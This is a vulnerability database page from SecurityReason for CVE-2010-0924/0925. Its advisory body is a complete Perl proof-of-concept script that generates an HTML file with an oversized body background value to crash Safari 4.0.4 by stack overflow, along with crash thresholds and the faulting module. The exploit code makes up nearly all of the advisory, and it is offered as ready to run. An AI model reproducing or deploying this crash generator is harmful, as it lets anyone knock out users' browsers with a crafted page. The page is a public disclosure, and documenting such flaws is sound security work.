|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 7083 CVE : CVE-2010-0924 CVE : CVE-2010-0925 CWE : CWE-Other SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes Credit : John Cobb Published : 07.03.2010
Advisory Content : #!/usr/bin/perl # # Safari 4.0.4 (531.21.10) - Stack Overflow/run # 0Day DoS POC by John Cobb - www.NoBytes.com - 20/01/2010 - [v1.1] # Tested on WinXP (32bit) SP3 # # v1.1: # Extra Tags which also crash: # <img src = # <iframe src = # # Magic Numbers: # 114516 -> 114718 : Safari quits without error # 114719 : Safari quits with illegal operation: # AppName: safari.exe # AppVer: 5.31.21.10 # ModName: cfnetwork.dll # ModVer: 1.450.5.0 # Offset: 000567a7 $filename = $ARGV[0]; $buffer = $ARGV[1]; if(!defined($filename)) { print "Usage: $0 <filename.html> <buffer>\n\n"; } $header = "<html> <head>" . "\n"; $crash = "<body background = \"" . "A" x $buffer . "\">" . "\n"; $footer = "</html>" . "\n"; $data = $header . $crash . $footer; open(FILE, '>' . $filename); print FILE $data; close(FILE); exit; References : http://nobytes.com/exploits/Safari_4.0.4_background_DoS_pl.txt  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |